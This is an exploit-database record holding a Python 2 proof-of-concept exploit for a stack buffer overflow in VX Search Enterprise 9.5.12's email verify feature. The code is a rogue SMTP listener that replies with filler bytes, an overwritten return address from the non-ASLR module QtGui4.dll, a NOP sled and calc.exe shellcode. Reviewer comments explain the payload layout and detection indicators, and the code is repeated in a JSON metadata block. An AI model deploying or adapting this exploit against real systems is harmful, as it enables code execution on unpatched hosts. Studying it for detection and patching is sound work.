ID 1337DAY-ID-27458
Type zdt
Reporter ScrR1pTK1dd13
Modified 2017-03-28T00:00:00
Description
Exploit for windows platform in category dos / poc
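# Proof-of-concept listing (Python 2 syntax: print statements, str used as bytes).
# It is a listener, not a client: it waits on TCP 25 and answers every
# connection with a single crafted line, then hangs up.
# NOTE(review): the title names the "email verify" feature of VX Search
# Enterprise v9.5.12 as the component that connects and parses this reply;
# the script itself does not show the client side -- confirm against the product.
# NOTE(review): the accompanying record lists no CVE and a CVSS score of 0.0
# with vector NONE. That looks like "not scored" rather than "no impact"; the
# payload below is built to overwrite a return address, so triage on content.
author = '''
##############################################
# Created: ScrR1pTK1dd13 #
# Name: Greg Priest #
# Mail: [email protected] #
##############################################
# Exploit Title: VX Search Enterprise v9.5.12 email verify exploit
# Date: 2017.03.28
# Exploit Author: Greg Priest
# Version: VX Search Enterprise v9.5.12
# Tested on: Windows7 x64 HUN/ENG Professional
'''
import socket

# Bound to loopback only: as written, only software on the same host can
# reach this listener.
port = 25
s = socket.socket()
ip = '127.0.0.1'
s.bind((ip, port))
s.listen(5)

# Payload layout (384 bytes + CRLF):
#   256 filler bytes | 4-byte address | 12-byte 0x90 pad | 112-byte shellcode
overflow = "A" * 256
# Little-endian 0x651BB77A. Per the author's notes below, the candidates were
# picked from QtGui4.dll because that module is not ASLR-enabled, which is what
# lets a constant address be used. Randomising that module (a build linked
# with /DYNAMICBASE, or OS-enforced mandatory ASLR) should invalidate it.
# NOTE(review): the variable name implies this lands on the saved return
# address at offset 256; the offset is the author's, not verified here.
eip = "\x7A\xB7\x1B\x65"
# Search NO ASLR with mona.py
#"\x94\x21\x1C\x65" NO ASLR QtGui4.dll
#"\x7A\xB7\x1B\x65" NO ASLR QtGui4.dll
#"\x09\xc9\x1D\x65" NO ASLR QtGui4.dll
nop = "\x90" * 12
#calc.exe
# The ASCII fragments "Crea", "oces" and "calc" are visible in the bytes
# (rows 7, 8 and 12-13), consistent with the author's calc.exe label and
# usable as a static signature. NOTE(review): not disassembled here.
shellcode =(
"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f" +
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b" +
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33" +
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b" +
"\x57\x78\x01\xc2\x8b\x7a\x20\x01" +
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6" +
"\x45\x81\x3e\x43\x72\x65\x61\x75" +
"\xf2\x81\x7e\x08\x6f\x63\x65\x73" +
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66" +
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7" +
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9" +
"\xb1\xff\x53\xe2\xfd\x68\x63\x61" +
"\x6c\x63\x89\xe2\x52\x52\x53\x53" +
"\x53\x53\x53\x53\x52\x53\xff\xd7")
exploit = overflow+eip+nop+shellcode
print "Listening on port:", port
# Loop-body indentation was lost in this listing; restored here to match the
# copy held in the record's sourceData field.
while True:
    conn, addr = s.accept()
    # Sent immediately on connect, in place of an SMTP greeting. Network-side
    # indicator: the first server line starts with "AAAA..." instead of a
    # three-digit reply code and carries non-printable bytes.
    conn.send(exploit+'\r\n')
    conn.close()
    print ""
    # Printed after every connection; nothing here checks what happened on
    # the connecting side, so the message is not evidence of impact.
    print "Succesfully exploitation!"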
# 0day.today [2018-03-28] #
{"sourceData": "author = '''\r\n \r\n ##############################################\r\n # Created: ScrR1pTK1dd13 #\r\n # Name: Greg Priest #\r\n # Mail: [email\u00a0protected] # \r\n ##############################################\r\n \r\n# Exploit Title: VX Search Enterprise v9.5.12 email verify exploit\r\n# Date: 2017.03.28\r\n# Exploit Author: Greg Priest\r\n# Version: VX Search Enterprise v9.5.12\r\n# Tested on: Windows7 x64 HUN/ENG Professional\r\n'''\r\n \r\n \r\nimport socket\r\n \r\nport = 25\r\ns = socket.socket()\r\nip = '127.0.0.1' \r\ns.bind((ip, port)) \r\ns.listen(5) \r\n \r\noverflow = \"A\" * 256\r\neip = \"\\x7A\\xB7\\x1B\\x65\"\r\n# Search NO ASLR with mona.py\r\n#\"\\x94\\x21\\x1C\\x65\" NO ASLR QtGui4.dll\r\n#\"\\x7A\\xB7\\x1B\\x65\" NO ASLR QtGui4.dll\r\n#\"\\x09\\xc9\\x1D\\x65\" NO ASLR QtGui4.dll\r\nnop = \"\\x90\" * 12\r\n#calc.exe\r\nshellcode =(\r\n\"\\x31\\xdb\\x64\\x8b\\x7b\\x30\\x8b\\x7f\" +\r\n\"\\x0c\\x8b\\x7f\\x1c\\x8b\\x47\\x08\\x8b\" +\r\n\"\\x77\\x20\\x8b\\x3f\\x80\\x7e\\x0c\\x33\" +\r\n\"\\x75\\xf2\\x89\\xc7\\x03\\x78\\x3c\\x8b\" +\r\n\"\\x57\\x78\\x01\\xc2\\x8b\\x7a\\x20\\x01\" +\r\n\"\\xc7\\x89\\xdd\\x8b\\x34\\xaf\\x01\\xc6\" +\r\n\"\\x45\\x81\\x3e\\x43\\x72\\x65\\x61\\x75\" +\r\n\"\\xf2\\x81\\x7e\\x08\\x6f\\x63\\x65\\x73\" +\r\n\"\\x75\\xe9\\x8b\\x7a\\x24\\x01\\xc7\\x66\" +\r\n\"\\x8b\\x2c\\x6f\\x8b\\x7a\\x1c\\x01\\xc7\" +\r\n\"\\x8b\\x7c\\xaf\\xfc\\x01\\xc7\\x89\\xd9\" +\r\n\"\\xb1\\xff\\x53\\xe2\\xfd\\x68\\x63\\x61\" +\r\n\"\\x6c\\x63\\x89\\xe2\\x52\\x52\\x53\\x53\" +\r\n\"\\x53\\x53\\x53\\x53\\x52\\x53\\xff\\xd7\")\r\n \r\nexploit = overflow+eip+nop+shellcode\r\n \r\nprint \"Listening on port:\", port\r\n \r\nwhile True:\r\n conn, addr = s.accept() \r\n conn.send(exploit+'\\r\\n')\r\n conn.close()\r\n print \"\"\r\n print \"Succesfully exploitation!\"\n\n# 0day.today [2018-03-28] #", "description": "Exploit for windows platform in category dos / poc", "sourceHref": "https://0day.today/exploit/27458", "reporter": 
"ScrR1pTK1dd13", "href": "https://0day.today/exploit/description/27458", "type": "zdt", "viewCount": 6, "references": [], "lastseen": "2018-03-28T03:23:16", "published": "2017-03-28T00:00:00", "cvelist": [], "id": "1337DAY-ID-27458", "modified": "2017-03-28T00:00:00", "title": "VX Search Enterprise 9.5.12 - Verify Email Buffer Overflow Exploit", "edition": 1, "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": 0.5, "vector": "NONE", "modified": "2018-03-28T03:23:16", "rev": 2}, "dependencies": {"references": [], "modified": "2018-03-28T03:23:16", "rev": 2}, "vulnersScore": 0.5}}
{}